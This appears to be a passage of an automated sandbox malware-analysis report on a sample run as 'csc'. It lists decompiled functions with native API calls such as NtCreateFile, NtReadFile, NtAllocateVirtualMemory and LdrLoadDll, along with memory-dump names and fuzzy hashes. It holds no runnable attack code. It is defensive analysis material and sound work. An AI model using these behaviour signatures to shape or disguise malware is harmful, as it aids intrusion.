
                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                                                                  • String ID: 1JA$rMA$rMA
                                                                                                                                                                                                                                                                                  • API String ID: 2738559852-782607585
                                                                                                                                                                                                                                                                                  • Opcode ID: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
                                                                                                                                                                                                                                                                                  • Instruction ID: 6fb213b5ecae9b2d78436e96d981fe4cc20fd8036c0d356658e2c76b782acd04
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0F0F4B2200118ABCB08DF99DC80EEB77ADEF8C754F158248BE0D97241D630E811CBA0
                                                                                                                                                                                                                                                                                  Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                                                                  • String ID: 1JA$rMA$rMA
                                                                                                                                                                                                                                                                                  • API String ID: 2738559852-782607585
                                                                                                                                                                                                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                                                                                                  • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                                                                                                                                                                                                  Function 0041A3B2 Relevance: 1.6, APIs: 1, Instructions: 57filenativeCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 208 41a3b2-41a3b6 209 41a3b8-41a3d6 208->209 210 41a39c-41a3b1 NtCreateFile 208->210 212 41a3dc-41a409 209->212 213 41a3d7 call 41af60 209->213 213->212
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                  • Opcode ID: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
                                                                                                                                                                                                                                                                                  • Instruction ID: a7a1a1cfa9bd20287bf16b9f77af049775cbda1b728cc0b5c91c8d781c512f10
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E001EDB6200108AFCB08DF99DC84DEB77ADEF8C724F158659FA1D97290C630E951CBA4
                                                                                                                                                                                                                                                                                  Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 245 40acf0-40ad0c 246 40ad14-40ad19 245->246 247 40ad0f call 41cc50 245->247 248 40ad1b-40ad1e 246->248 249 40ad1f-40ad2d call 41d070 246->249 247->246 252 40ad3d-40ad4e call 41b4a0 249->252 253 40ad2f-40ad3a call 41d2f0 249->253 258 40ad50-40ad64 LdrLoadDll 252->258 259 40ad67-40ad6a 252->259 253->252 258->259
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                                                                                                                                  • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                                                                                                                                                                                                                                                  Function 0041A35B Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 266 41a35b-41a3b1 call 41af60 NtCreateFile
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
                                                                                                                                                                                                                                                                                  • Instruction ID: f7f4107286774cdf51585c7b95314371371209a0b209ae894d56bd91292c74bc
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2801B2B2201108AFCB58DF99DC95EEB77A9EF8C754F158248FA0DD7241D630E851CBA4
                                                                                                                                                                                                                                                                                  Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 270 41a360-41a376 271 41a37c-41a3b1 NtCreateFile 270->271 272 41a377 call 41af60 270->272 272->271
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                                                                                                  • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                                                                                                                                                  Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                  control_flow_graph 274 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                                                                  • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                                                                                                                                                                                                                  Function 0041A48B Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                                                                                                                                                                                                                                                                  • Instruction ID: b3fdf63f4ad5ff6f1f79f001bf06b592d21b89135aeb14a04be9777f4d5fd233
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE08C712402046BD710EB98CC46FA73BA8EF88724F248499BA0C5B242C131E90187D0
                                                                                                                                                                                                                                                                                  Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                                                                  • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                                                                                                                                                                                                                  Function 05CA2DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 380244249e30e48bed52489ab0cccc2f0ae94ce953f922e222d3df04aefc450a
                                                                                                                                                                                                                                                                                  • Instruction ID: f94d865fa48c7c900a877e934f53759655318122d1ab3251600b043190d118dd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 380244249e30e48bed52489ab0cccc2f0ae94ce953f922e222d3df04aefc450a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E9002B160100403E540715845447C6001987D0305F91C815A5054558EC6AA8DD57665
                                                                                                                                                                                                                                                                                  Function 05CA2DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: fefa8ab065fc55f61f15d487ba4c3f7f300e948352d2083434848ec40f64af9b
                                                                                                                                                                                                                                                                                  • Instruction ID: dfca44f715e57e42a5fbbb6e797771cd1bc655fb6517c82ec20b2bd133e5e8af
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fefa8ab065fc55f61f15d487ba4c3f7f300e948352d2083434848ec40f64af9b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB900261A0100503E50171584544696001E87D0245FD1C826A1014559ECA768D92B131
                                                                                                                                                                                                                                                                                  Function 05CA2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 483b4c0148de94a4703cc3e0ef3cf8f3e600176d5b30f5e74fd207a39fe913c1
                                                                                                                                                                                                                                                                                  • Instruction ID: 6623fd9da072df30454456aa019b5d2da12bb5db9bca409c7fa3a85ed455115d
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 483b4c0148de94a4703cc3e0ef3cf8f3e600176d5b30f5e74fd207a39fe913c1
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E90027160100413E51161584644787001D87D0245FD1CC16A041455CDD6A78D52B121
                                                                                                                                                                                                                                                                                  Function 05CA2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 3a89719c265ce8e09a496cfe5a449a65da2eafec92ee7a9cd49d928e58a9ce37
                                                                                                                                                                                                                                                                                  • Instruction ID: 5426d14c9f383336ce1547414087401b73122d76c505eaa7eabb8d61c5367cd2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a89719c265ce8e09a496cfe5a449a65da2eafec92ee7a9cd49d928e58a9ce37
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE900261642041536945B1584544587401A97E0245FD1C816A1404954CC5779C56E621
                                                                                                                                                                                                                                                                                  Function 05CA2C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 6e94d82a1d55a8db90ae82f9617cc3778a66196baec8a55518347ec5d4a0a882
                                                                                                                                                                                                                                                                                  • Instruction ID: 1c103c5914426f965605d46efaf03c62da06d4dca7458cff80b03163e8fd6dc9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e94d82a1d55a8db90ae82f9617cc3778a66196baec8a55518347ec5d4a0a882
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F590026170100003E540715855586864019D7E1305F91D815E0404558CD9668C566222
                                                                                                                                                                                                                                                                                  Function 05CA2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: f7c14253da2aa51cbaba26b3bb4394002108ab4be58bd741157dfeeb70b0004d
                                                                                                                                                                                                                                                                                  • Instruction ID: a2b433ab058deb23f0512a7b9a3449b98c046343bee715fc11ea8d0559ebdcc2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7c14253da2aa51cbaba26b3bb4394002108ab4be58bd741157dfeeb70b0004d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B190026961300003E5807158554868A001987D1206FD1DC19A000555CCC9668C696321
                                                                                                                                                                                                                                                                                  Function 05CA2F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: fa69156e6d900c9b837824d51fdd242e724c3a48dfa076d726363632a51cd9ad
                                                                                                                                                                                                                                                                                  • Instruction ID: 016d88c041c19a0f45829b114dfef3154cfb2a8b84bdb7357960a7a6749fd0ef
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa69156e6d900c9b837824d51fdd242e724c3a48dfa076d726363632a51cd9ad
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA90026161180043E60065684D54B87001987D0307F91C919A0144558CC9668C616521
                                                                                                                                                                                                                                                                                  Function 05CA2ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
